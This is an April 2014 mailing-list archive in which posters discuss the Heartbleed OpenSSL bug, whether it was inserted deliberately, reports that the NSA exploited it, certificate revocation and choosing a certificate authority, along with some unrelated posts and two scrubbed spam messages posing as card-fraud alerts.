<149518711.83101.1397221629681.JavaMail.www@wwinf8224> > Message du 11/04/14 05:44 > De : dan at geer.org > > It makes me wonder if the NSA was involved in inserting this bug into > > OpenSSL clients and servers. > > If they did it, someone got a promotion. If they are as surprised > as you are, someone got fired. > > In the meantime, tell me that gcc is so compact and well vetted that > there is no room in it for insertions... > This article makes an interesting point, we got to dig a bit more from our pockets: http://www.wired.com/2014/04/heartbleedslesson/ The second point I wish to make is the surprise by which the original developer took the issue. Maybe, just maybe, he did not create that flaw at all. It could have been inserted into the OpenSSL repository through a backdoor ... or why would the spies by so interested in hacking professors that deal with crypto and whose word is trusted by the masses? Like they did to a Belgian cryptographer? Was that fellow nerd a turrist of sorts? It may be possible that Segelmann did his job correctly, that the reviewer did his job correctly, but someone unknown may have changed it just a little bit before delivery. Besides funding projects like OpenSSL better, we should start considering the security of the repositories themselves. What ya fellow coders think? From adi at hexapodia.org Fri Apr 11 15:44:19 2014 From: adi at hexapodia.org (Andy Isaacson) Date: Fri, 11 Apr 2014 15:44:19 -0700 Subject: NSA alleged to have known & used Heartbleed for 2 years In-Reply-To: References: <53484395.9090208@entersection.org> <53485E00.5050500@entersection.org> Message-ID: <20140411224419.GL18407@hexapodia.org> On Fri, Apr 11, 2014 at 06:13:04PM -0400, grarpamp wrote: > > Denials: > > https://twitter.com/NSA_PAO/status/454720059156754434 > > https://twitter.com/csoghoian/status/454725375332192256 > > Uncharacteristically little weasel room in the pao link. The only weasel room I can see is if the exploitation capabilities are in DoD Cyber Command, rather than NSA. -andy From gfoster at entersection.org Fri Apr 11 14:26:35 2014 From: gfoster at entersection.org (Gregory Foster) Date: Fri, 11 Apr 2014 16:26:35 -0500 Subject: NSA alleged to have known & used Heartbleed for 2 years In-Reply-To: <53484395.9090208@entersection.org> References: <53484395.9090208@entersection.org> Message-ID: <53485E00.5050500@entersection.org> On 4/11/14, 2:33 PM, Gregory Foster wrote: > Bloomberg (Apr 11) - "NSA Said to Have Used Heartbleed Bug, Exposing > Consumers": > http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html > >> The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said. Denials: https://twitter.com/NSA_PAO/status/454720059156754434 https://twitter.com/csoghoian/status/454725375332192256 I couldn't find the primary source for the White House NSC statement Christopher posted. The "Vulnerabilities Equities Process" used to ascertain whether or not to report 0-days sounds FOIA-worthy. gf -- Gregory Foster || gfoster at entersection.org @gregoryfoster <> http://entersection.com/ From guninski at guninski.com Fri Apr 11 06:32:44 2014 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 11 Apr 2014 16:32:44 +0300 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> References: <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224> Message-ID: <20140411133240.GA16269@sivokote.iziade.m$> On Fri, Apr 11, 2014 at 03:07:09PM +0200, tpb-crypto at laposte.net wrote: > > Message du 11/04/14 05:44 > > De : dan at geer.org > > > It makes me wonder if the NSA was involved in inserting this bug into > > > OpenSSL clients and servers. > > > > If they did it, someone got a promotion. If they are as surprised > > as you are, someone got fired. > > > > In the meantime, tell me that gcc is so compact and well vetted that > > there is no room in it for insertions... > > > > This article makes an interesting point, we got to dig a bit more from our pockets: > > http://www.wired.com/2014/04/heartbleedslesson/ > > The second point I wish to make is the surprise by which the original developer took the issue. Maybe, just maybe, he did not create that flaw at all. > > It could have been inserted into the OpenSSL repository through a backdoor ... or why would the spies by so interested in hacking professors that deal with crypto and whose word is trusted by the masses? Like they did to a Belgian cryptographer? Was that fellow nerd a turrist of sorts? > > It may be possible that Segelmann did his job correctly, that the reviewer did his job correctly, but someone unknown may have changed it just a little bit before delivery. > > > Besides funding projects like OpenSSL better, we should start considering the security of the repositories themselves. > > What ya fellow coders think? I certainly don't trust repositories ;) btw, I think this heartbleed story is exaggerated. If it were code execution it would have been much worse. browser vendors fix _a lot_ of "unspecified memory hazards" every few months. IMO getting owned by a browser bug is much more likely than by heartbleed. Is there a significant rise of revoked certs caused by HB paranoia? From rysiek at hackerspace.pl Fri Apr 11 07:43:03 2014 From: rysiek at hackerspace.pl (rysiek) Date: Fri, 11 Apr 2014 16:43:03 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <20140411133240.GA16269@sivokote.iziade.m$> References: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> <20140411133240.GA16269@sivokote.iziade.m$> Message-ID: <1409607.uUXFrpi0Wi@lap> Dnia piątek, 11 kwietnia 2014 16:32:44 Georgi Guninski pisze: > On Fri, Apr 11, 2014 at 03:07:09PM +0200, tpb-crypto at laposte.net wrote: > > > Message du 11/04/14 05:44 > > > De : dan at geer.org > > > > > > > It makes me wonder if the NSA was involved in inserting this bug into > > > > OpenSSL clients and servers. > > > > > > If they did it, someone got a promotion. If they are as surprised > > > as you are, someone got fired. > > > > > > In the meantime, tell me that gcc is so compact and well vetted that > > > there is no room in it for insertions... > > > > This article makes an interesting point, we got to dig a bit more from our > > pockets: > > > > http://www.wired.com/2014/04/heartbleedslesson/ > > > > The second point I wish to make is the surprise by which the original > > developer took the issue. Maybe, just maybe, he did not create that flaw > > at all. > > > > It could have been inserted into the OpenSSL repository through a backdoor > > ... or why would the spies by so interested in hacking professors that > > deal with crypto and whose word is trusted by the masses? Like they did > > to a Belgian cryptographer? Was that fellow nerd a turrist of sorts? > > > > It may be possible that Segelmann did his job correctly, that the reviewer > > did his job correctly, but someone unknown may have changed it just a > > little bit before delivery. > > > > > > Besides funding projects like OpenSSL better, we should start considering > > the security of the repositories themselves. > > > > What ya fellow coders think? > > I certainly don't trust repositories ;) > > btw, I think this heartbleed story is > exaggerated. If it were code execution > it would have been much worse. > > browser vendors fix _a lot_ of > "unspecified memory hazards" every few > months. > > IMO getting owned by a browser bug is > much more likely than by heartbleed. How do you get owned by a browser bug on a server? I mean, HB is huge, because: - it affects servers; - potentially allows access to private keys and passwords; - this, in case of forward-secrecy-less setups allows the bad guys to decrypt all saved traffic. It's as bad as any root-level remote exploit on a server. And because, you know, "everybody uses OpenSSL", and because it was unknown but in the code for 2+ years, the attack surface was (and is) huge. > Is there a significant rise of revoked certs caused > by HB paranoia? No idea, but we're considering revoking ours. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From tpb-crypto at laposte.net Fri Apr 11 08:06:56 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Fri, 11 Apr 2014 17:06:56 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: References: Your message of "Thu, 10 Apr 2014 03:46:44 EDT." <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224> Message-ID: <897399326.23701.1397228816179.JavaMail.www@wwinf8313> > Message du 11/04/14 15:38 > De : "Cathal Garvey (Phone)" > It'd be hard to hide an insertion if the devs all dig into the hashes of commits of their own local repos and compare, right? Even a broken hash would require changing input, so they could go an extra step and verify each commit using another hash algo, if they were feeling super-paranoid. > > I'm still on the fence: this is the kind of error C is infamous for after all. > Right, it is highly unlikely but not impossible, maybe the devs have copies and are digging through it. Which also won't exclude that Segelmann's PC itself was hacked in and the code modified after he e-mailed someone about having his job concluded and was delivering the goods. Considering that the tinfoilers were right all along during an entire decade, I'm also on the fence with this. From grarpamp at gmail.com Fri Apr 11 15:13:04 2014 From: grarpamp at gmail.com (grarpamp) Date: Fri, 11 Apr 2014 18:13:04 -0400 Subject: NSA alleged to have known & used Heartbleed for 2 years In-Reply-To: <53485E00.5050500@entersection.org> References: <53484395.9090208@entersection.org> <53485E00.5050500@entersection.org> Message-ID: On Fri, Apr 11, 2014 at 5:26 PM, Gregory Foster wrote: >> http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html >>> The U.S. National Security Agency knew for at least two years > Denials: > https://twitter.com/NSA_PAO/status/454720059156754434 > https://twitter.com/csoghoian/status/454725375332192256 Uncharacteristically little weasel room in the pao link. > I couldn't find the primary source for the White House NSC statement > Christopher posted. The "Vulnerabilities Equities Process" used to > ascertain whether or not to report 0-days sounds FOIA-worthy. They mention first knowledge in April but... Note the create date (at MITRE, ahem) in the second link. And packets (whether attributable to, or perhaps reasonably thought to be capable of detection, classification, and later use by a large and capable monitoring net) in the third link. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 https://www.eff.org/deeplinks/2014/04/wild-heart-were-intelligence-agencies-using-heartbleed-november-2013 From fraud at americanexpress.com Fri Apr 11 10:24:57 2014 From: fraud at americanexpress.com (American Express) Date: Fri, 11 Apr 2014 18:24:57 +0100 Subject: Irregular card activity Message-ID: A non-text attachment was scrubbed... Name: not available Type: text/html Size: 12545 bytes Desc: not available URL: From guninski at guninski.com Fri Apr 11 08:34:01 2014 From: guninski at guninski.com (Georgi Guninski) Date: Fri, 11 Apr 2014 18:34:01 +0300 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1409607.uUXFrpi0Wi@lap> References: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> <20140411133240.GA16269@sivokote.iziade.m$> <1409607.uUXFrpi0Wi@lap> Message-ID: <20140411153401.GB16269@sivokote.iziade.m$> On Fri, Apr 11, 2014 at 04:43:03PM +0200, rysiek wrote: > > How do you get owned by a browser bug on a server? I mean, HB is huge, > because: Own the admin or something like this (probably doesn't work for all admins, check the ACLU snowden docs for how NSA targets admins via browser bugs). > - it affects servers; > - potentially allows access to private keys and passwords; > - this, in case of forward-secrecy-less setups allows the bad guys to > decrypt all saved traffic. > > It's as bad as any root-level remote exploit on a server. And because, you Disagree. AFAICT it doesn't affect openssh, only TLS. remote preauth openssh would be fun, though ;) > know, "everybody uses OpenSSL", and because it was unknown but in the code for > 2+ years, the attack surface was (and is) huge. > Continue to believe that much more info is stolen via client bugs U buggy CMS/cgi + privilege escalation (see kernel changelogs). > > Is there a significant rise of revoked certs caused > > by HB paranoia? > > No idea, but we're considering revoking ours. > This is sound, suspect you are minority. Most people don't reinstall even after full ownage. -- cheers From juan.g71 at gmail.com Fri Apr 11 14:44:09 2014 From: juan.g71 at gmail.com (Juan Garofalo) Date: Fri, 11 Apr 2014 18:44:09 -0300 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <2304065.KDyk0d8uBL@lap> References: <2853647.cGAsq4hNKP@lap> <53471455.9010801@loom.cc> <2304065.KDyk0d8uBL@lap> Message-ID: --On Friday, April 11, 2014 1:10 AM +0200 rysiek wrote: > Dnia czwartek, 10 kwietnia 2014 17:59:49 Patrick Chkoreff pisze: >> rysiek wrote, On 04/10/2014 04:08 PM: >> > Dnia czwartek, 10 kwietnia 2014 16:26:46 Juan Garofalo pisze: >> >> --On Thursday, April 10, 2014 3:46 AM -0400 grarpamp >> >> >> >> >> >> Oh. And what about the constant babbling stating that open source >> >> is oh-so-great security-wise because lots of people can look at >> >> the code bla bla bla bla bla. Bla! >> > >> > Well, they can. Doesn't mean they do. Time to get the message out >> > there: "start bloody looking at the code". >> >> And time to start building from source, examining source diffs, and >> devising one's own stress tests. > > Also, this: > http://www.youtube.com/watch?v=fwcl17Q0bpk Ha! Very good =) > > -- > Pozdr > rysiek From grarpamp at gmail.com Fri Apr 11 15:48:11 2014 From: grarpamp at gmail.com (grarpamp) Date: Fri, 11 Apr 2014 18:48:11 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: References: <20140411031512.1B3E12280F8@palinka.tinho.net> <149518711.83101.1397221629681.JavaMail.www@wwinf8224> Message-ID: On Fri, Apr 11, 2014 at 9:37 AM, Cathal Garvey (Phone) wrote: > It'd be hard to hide an insertion if the devs all dig into the hashes of > commits of their own local repos and compare, right? Even a broken hash > would require changing input, so they could go an extra step and verify each > commit using another hash algo, if they were feeling super-paranoid. The detection would often occur with a scrub type of routine maintenance check or automatically depending on the system. And unfortunately there are many critical repos that essentially refuse to move to a revcontrol system that employs signable hashes/merkle such that a cracked repo or even bitrot could be detected. Often out of such non claims [1] as workflow and effort to switch. FreeBSD is an example of such a key repo. http://www.git-scm.com/ http://www.git-scm.com/about/distributed [1] Considering potential the core-outwards architectural integrity benefits, among others. >> This article makes an interesting point, we got to dig a bit more from our >> pockets: >> >> http://www.wired.com/2014/04/heartbleedslesson/ >> >> The second point I wish to make is the surprise by which the original >> developer took the issue. Maybe, just maybe, he did not create that flaw >> at all. >> >> It could have been inserted into the OpenSSL repository through a backdoor >> ... or why would the spies by so interested in hacking professors that deal >> with crypto and whose word is trusted by the masses? Like they did to a >> Belgian cryptographer? Was that fellow nerd a turrist of sorts? >> >> It may be possible that Segelmann did his job correctly, that the reviewer >> did his job correctly, but someone unknown may have changed it just a little >> bit before delivery. >> >> >> Besides funding projects like OpenSSL better, we should start considering >> the security of the repositories themselves. >> >> What ya fellow coders think? From grarpamp at gmail.com Fri Apr 11 16:02:53 2014 From: grarpamp at gmail.com (grarpamp) Date: Fri, 11 Apr 2014 19:02:53 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1409607.uUXFrpi0Wi@lap> References: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> <20140411133240.GA16269@sivokote.iziade.m$> <1409607.uUXFrpi0Wi@lap> Message-ID: On Fri, Apr 11, 2014 at 10:43 AM, rysiek wrote: > Dnia piątek, 11 kwietnia 2014 16:32:44 Georgi Guninski pisze: >> Is there a significant rise of revoked certs caused >> by HB paranoia? > > No idea, but we're considering revoking ours. As to ocsp/crl revocation, haven't looked (depending on application, getting the cert swapped out is more important anyway). But those of us who pin down certs instead of trusting CA's have been doing quite a bit of reconfiguring this week due to upstream certs being swapped out. From fraud at americanexpress.com Fri Apr 11 16:08:17 2014 From: fraud at americanexpress.com (American Express) Date: Fri, 11 Apr 2014 19:08:17 -0400 Subject: Irregular check card activity Message-ID: {_BODY_TEXT} -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 12633 bytes Desc: not available URL: From rysiek at hackerspace.pl Fri Apr 11 10:54:24 2014 From: rysiek at hackerspace.pl (rysiek) Date: Fri, 11 Apr 2014 19:54:24 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <534820A6.7030408@virtadpt.net> References: <534820A6.7030408@virtadpt.net> Message-ID: <3135353.1KRi2F89Iu@lap> Dnia piątek, 11 kwietnia 2014 10:04:38 The Doctor pisze: > The timing of the commit in question is most interesting, indeed: > > http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c508216 > 1b02a22116ad75f822b1 > > ...the date and time of the year when people are least likely to be > sitting at their computers watching for and reviewing commits. Only > better time would probably have been at 2359 hours UTC. Now I love my conspiracy theories just like the next guy and I definitely do not take sides (I am myself quite inclined to think this is not entirely an honest mistake), but... ...the kind of argument you make rings a bell: http://en.wikipedia.org/wiki/Anthropic_bias I agree that this was the very best time for a commit so that nobody sees it/reviews it. Maybe this is why nobody has seen it nor reviewed it? As in, the very fact it is so does not prove that it was done at this time on purpose. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From peter at petermalone.org Fri Apr 11 19:57:42 2014 From: peter at petermalone.org (Peter Malone) Date: Fri, 11 Apr 2014 22:57:42 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <129490266.188962.1397263722030.JavaMail.www@wwinf8312> References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap> <53482E2B.4050201@cpunk.us> <129490266.188962.1397263722030.JavaMail.www@wwinf8312> Message-ID: <1397271462.21597.12.camel@shire> I don't buy into conspiracy theories often but I really can't see how you can fail to follow your own RFC. If he had a check in there to make sure the payload_length wasn't too large I would say "hey, he forgot to make sure it wasn't too small and he never even mentioned checking if it was too small that in the RFC"... but he actually never checked for anything.. so maybe it is just a mistake. He definitely failed to follow his own RFC which never mentioned making sure the length was correct, just that it wasn't too big, and that's something he never did. I don't get how the reviewer can miss it too, like it's code for an RFC the reviewer is COMPLETELY new to... so at first the code looks a bit mad until you read the RFC, then you realize right away that he's missing shit. Seems silly, i don't think the reviewer ever read the RFC. On Sat, 2014-04-12 at 02:48 +0200, tpb-crypto at laposte.net wrote: > > Message du 11/04/14 20:33 > > De : "Cypher" > > > > I agree that there is no proof that this bug was introduced on purpose > > and it might be a simple oversight (no matter what it looks like or > > could be). We have to keep in mind that one of the things spies do is > > sow suspicion and doubt - it's a powerful weapon! All these > > vulnerabilities we're finding in critical software /might just be/ > > mistakes and oversights. Or they might be deliberate attacks by the > > NSA/GCHQ. Part of the power these agencies wield is that /we'll likely > > never know/ and so we suspect...everyone. Everything. > > > > Too many bugs, in too many convenient places. One or two may be a coincidence, several of them like it appears to be the case, is not. We know who did it and now even if it is a coincidence, the culprit will be pointed at the NSA. > > The timing the code was included in the tree cannot be a coincidence. There's one more thing we have to look at. When nobody is paying attention, someone is trying to sneak bad code. > > The NSA mandate was to protect the people, not to make them vulnerable. Disbanding such a rogue organization would be the right thing to do. From tpb-crypto at laposte.net Fri Apr 11 17:48:42 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sat, 12 Apr 2014 02:48:42 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <53482E2B.4050201@cpunk.us> References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap> <53482E2B.4050201@cpunk.us> Message-ID: <129490266.188962.1397263722030.JavaMail.www@wwinf8312> > Message du 11/04/14 20:33 > De : "Cypher" > > I agree that there is no proof that this bug was introduced on purpose > and it might be a simple oversight (no matter what it looks like or > could be). We have to keep in mind that one of the things spies do is > sow suspicion and doubt - it's a powerful weapon! All these > vulnerabilities we're finding in critical software /might just be/ > mistakes and oversights. Or they might be deliberate attacks by the > NSA/GCHQ. Part of the power these agencies wield is that /we'll likely > never know/ and so we suspect...everyone. Everything. > Too many bugs, in too many convenient places. One or two may be a coincidence, several of them like it appears to be the case, is not. We know who did it and now even if it is a coincidence, the culprit will be pointed at the NSA. The timing the code was included in the tree cannot be a coincidence. There's one more thing we have to look at. When nobody is paying attention, someone is trying to sneak bad code. The NSA mandate was to protect the people, not to make them vulnerable. Disbanding such a rogue organization would be the right thing to do. From tpb-crypto at laposte.net Fri Apr 11 21:06:36 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sat, 12 Apr 2014 06:06:36 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1397271462.21597.12.camel@shire> References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap> <53482E2B.4050201@cpunk.us> <129490266.188962.1397263722030.JavaMail.www@wwinf8312> <1397271462.21597.12.camel@shire> Message-ID: <1560658505.137925.1397275596741.JavaMail.www@wwinf8312> > Message du 12/04/14 04:57 > De : "Peter Malone" > A : tpb-crypto at laposte.net > Copie à : "Cypher" , cypherpunks at cpunks.org > Objet : Re: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL > > I don't buy into conspiracy theories often but I really can't see how > you can fail to follow your own RFC. If he had a check in there to make > sure the payload_length wasn't too large I would say "hey, he forgot to > make sure it wasn't too small and he never even mentioned checking if it > was too small that in the RFC"... but he actually never checked for > anything.. so maybe it is just a mistake. He definitely failed to follow > his own RFC which never mentioned making sure the length was correct, > just that it wasn't too big, and that's something he never did. > > I don't get how the reviewer can miss it too, like it's code for an RFC > the reviewer is COMPLETELY new to... so at first the code looks a bit > mad until you read the RFC, then you realize right away that he's > missing shit. Seems silly, i don't think the reviewer ever read the RFC. > Look at the date and time the commit was done by the reviewer, make your own conclusions: http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c5082161b02a22116ad75f822b1 From drwho at virtadpt.net Sat Apr 12 09:45:40 2014 From: drwho at virtadpt.net (The Doctor) Date: Sat, 12 Apr 2014 09:45:40 -0700 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1567248.IM8gzNnxzb@lap> References: <534820A6.7030408@virtadpt.net> <1397271462.21597.12.camel@shire> <1560658505.137925.1397275596741.JavaMail.www@wwinf8312> <1567248.IM8gzNnxzb@lap> Message-ID: <53496DB4.8070200@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 04/12/2014 01:47 AM, rysiek wrote: > If anybody is to be suspected of anything unsavoury here, it's the > reviewer, I guess. If there was a reviewer looking at it, that is. That'd be the right time of year for teams to accept commits without looking at them. - -- The Doctor [412/724/301/703] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "All talk, no shock!" --Soundwave, _Transformers: the Movie_ -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ iEYEAREKAAYFAlNJbbQACgkQO9j/K4B7F8EjngCfSht7C8hKClYUwSY3QUeRfOs2 Xx0AniU6BrjuiHQaCfYW2kyjqE5lVwfj =xNyG -----END PGP SIGNATURE----- From rysiek at hackerspace.pl Sat Apr 12 01:47:34 2014 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 12 Apr 2014 10:47:34 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1560658505.137925.1397275596741.JavaMail.www@wwinf8312> References: <534820A6.7030408@virtadpt.net> <1397271462.21597.12.camel@shire> <1560658505.137925.1397275596741.JavaMail.www@wwinf8312> Message-ID: <1567248.IM8gzNnxzb@lap> Dnia sobota, 12 kwietnia 2014 06:06:36 tpb-crypto at laposte.net pisze: > Look at the date and time the commit was done by the reviewer, make your own > conclusions: > > http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c508216 > 1b02a22116ad75f822b1 If anybody is to be suspected of anything unsavoury here, it's the reviewer, I guess. -- Pozdr rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL: From jamesdbell9 at yahoo.com Sat Apr 12 13:37:58 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Sat, 12 Apr 2014 13:37:58 -0700 (PDT) Subject: Curious Intellectual Property Food-for-thought: "Live-forever Pingers" Message-ID: <1397335078.49963.YahooMailNeo@web126204.mail.ne1.yahoo.com> Some people debate whether 'intellectual property' (such as patents) should exist.  The standard for patenting is said to be:  An invention, to be patentable, should be "new, useful, and unobvious to those skilled in the art".  A month ago, when it became obvious that finding Air Malaysia Flight 370 could be difficult, the 30-day limit of the electronic pingers got me to thinking.  Why?  Instead of pinging for 30 days, why not have them ping increasingly slowly, so that the pinger would last 'forever'.  Considered discretely, let it ping at the normal rate for 1 week, at half the rate for the next week, at quarter the rate for the subsequent rate, etc.   Or, have a continuous equivalent of this, a ping-rate which slows to approximate this rate over time.  This kind of pinger would 'never' run out.    Should this idea be patentable?  Is it new?  I haven't heard of it.   Is it useful?  It is now clear why it would be useful...now!!!   Is it 'un-obvious'?  Well, despite the fact that I just thought of it a month ago, and I had never heard it proposed before, I wonder why it shouldn't be called 'obvious'.  If anything, I think it's amazing that it hasn't been implemented before.  People who work in aeronautics and electronics are smart and imaginative...at least I thought they were...until now? It should also be possible to include in the ping, information  (transmitted by pulse-position information) about the last lat/lon received by the aircraft.           Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1872 bytes Desc: not available URL: From eric at konklone.com Sat Apr 12 10:40:02 2014 From: eric at konklone.com (Eric Mill) Date: Sat, 12 Apr 2014 13:40:02 -0400 Subject: If not StartSSL, the next best CA for individuals? Message-ID: (Setting aside how awful the CA system is generally...) For those who still have a need to participate in it, and for those angry at StartCom's refusal to waive[1][2] revocation fees for their free class 1 certs, what's the best CA for the job? Even if not free, I'm looking to recommend[3] something priced attractively for individuals and non-commercial uses. The friendlier the interface, and the more reliable and principled the customer service, the better. -- Eric [1] https://cv.exbit.io/emails/startssl_heartbeat.txt [2] https://twitter.com/startssl/status/453631038883758080 [3] https://konklone.com/post/switch-to-https-now-for-free -- konklone.com | @konklone From gfoster at entersection.org Sat Apr 12 17:53:33 2014 From: gfoster at entersection.org (Gregory Foster) Date: Sat, 12 Apr 2014 19:53:33 -0500 Subject: NSA alleged to have known & used Heartbleed for 2 years In-Reply-To: <53485E00.5050500@entersection.org> References: <53484395.9090208@entersection.org> <53485E00.5050500@entersection.org> Message-ID: <5349E00D.3070704@entersection.org> On 4/11/14, 4:26 PM, Gregory Foster wrote: > Bloomberg (Apr 11) - "NSA Said to Have Used Heartbleed Bug, Exposing > Consumers": > http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html > >> The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said. > On 4/11/14, 2:33 PM, Gregory Foster wrote: > Denials: > https://twitter.com/NSA_PAO/status/454720059156754434 > https://twitter.com/csoghoian/status/454725375332192256 > > I couldn't find the primary source for the White House NSC statement > Christopher posted. The "Vulnerabilities Equities Process" used to > ascertain whether or not to report 0-days sounds FOIA-worthy. NYT (Apr 12) - "Obama Lets N.S.A. Exploit Some Internet Flaws, Officials Say" by David @SangerNYT: http://www.nytimes.com/2014/04/13/us/politics/after-heartbleed-bug-obama-decides-us-should-reveal-internet-security-flaws.html > Caitlin Hayden, the spokeswoman for the National Security Council, said the review of the recommendations [by a presidential advisory committee] was now complete, and it had resulted in a “reinvigorated” process to weigh the value of disclosure when a security flaw is discovered, against the value of keeping the discovery secret for later use by the intelligence community. > > “This process is biased toward responsibly disclosing such vulnerabilities,” she said. gf -- Gregory Foster || gfoster at entersection.org @gregoryfoster <> http://entersection.com/ From guido at witmond.nl Sat Apr 12 12:12:43 2014 From: guido at witmond.nl (Guido Witmond) Date: Sat, 12 Apr 2014 21:12:43 +0200 Subject: If not StartSSL, the next best CA for individuals? In-Reply-To: References: Message-ID: <5349902B.2050906@witmond.nl> On 04/12/14 19:40, Eric Mill wrote: > (Setting aside how awful the CA system is generally...) > > For those who still have a need to participate in it, and for those > angry at StartCom's refusal to waive[1][2] revocation fees for their > free class 1 certs, what's the best CA for the job? > > Even if not free, I'm looking to recommend[3] something priced > attractively for individuals and non-commercial uses. The friendlier > the interface, and the more reliable and principled the customer > service, the better. Read the draft of Peter Gutmann's big book called Security Engineering. [1] It tell (among things) the story that people accept scary warnings a signal that a site is secure. Even if the opposite it true. I suggest to create a self-signed certificate. (Unless you're a bank as Firefox warns against that). Guido. 1: https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 897 bytes Desc: OpenPGP digital signature URL: From l at odewijk.nl Sat Apr 12 16:28:14 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Sun, 13 Apr 2014 01:28:14 +0200 Subject: NSA good guys In-Reply-To: References: <534691BD.1060904@cathalgarvey.me> Message-ID: I haven't been able to satisfy any clear conditions for being good or bad guys. Not even for being patriots or not. Ultimately it doesn't matter. Their jobs are inherently evil. Spying always has been, but this is different because it involves everyone (even without being suspect) and costs for additional invasion of privacy\surveillance is negligible. Meaning a single person that doesn't do his/her job can ruin the world (in *many* scenario's). Looking at Snowden there is not the kind of security procedures to prevent it, either. So. Are the NSA guys good guys? Well. They're the enemy of the people, as they invade their privacy and therewith their safety. If you can be blackmailed, studied, influenced, etc. you are weak and vulnerable. Preaching to the choir, I guess. So I cannot call them good guys by a very long shot. Are the NSA guys bad guys? Well, they do anything to protect their nation from whatever attack could happen (bad for non-US; me). They steal secrets for their government (bad for non-US; me). They assist foreign secret agencies in subverting or avoiding legal restrictions put in place to protect citizens as (real/wise/elected) politicians see fit. (very bad for non-US; me) Uh. Yeah. I guess they're the bad guys. I usually feel like they are soldiers on a certain mission, and so no blame comes to them. But I feel more strongly that the organization is build to produce law-breaking, privacy-destroying, unethical, unfriendly, aggressive, anticompetative, distracting and confusing and ultimately just *mean* practices. So yes: the NSA is *EVIL* to the maximum realistic extend. The NSA's people enjoy a margin of appreciation. They're doing a job. They have their reasons. But I do believe most of them are keenly aware of the extremely large quantity of thoroughly unethical things their organization is doing, and must be considered at least partially responsible. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2413 bytes Desc: not available URL: From coderman at gmail.com Sun Apr 13 06:44:56 2014 From: coderman at gmail.com (coderman) Date: Sun, 13 Apr 2014 06:44:56 -0700 Subject: a speech In-Reply-To: <20140411024045.274C02280F0@palinka.tinho.net> References: <20140411024045.274C02280F0@palinka.tinho.net> Message-ID: On 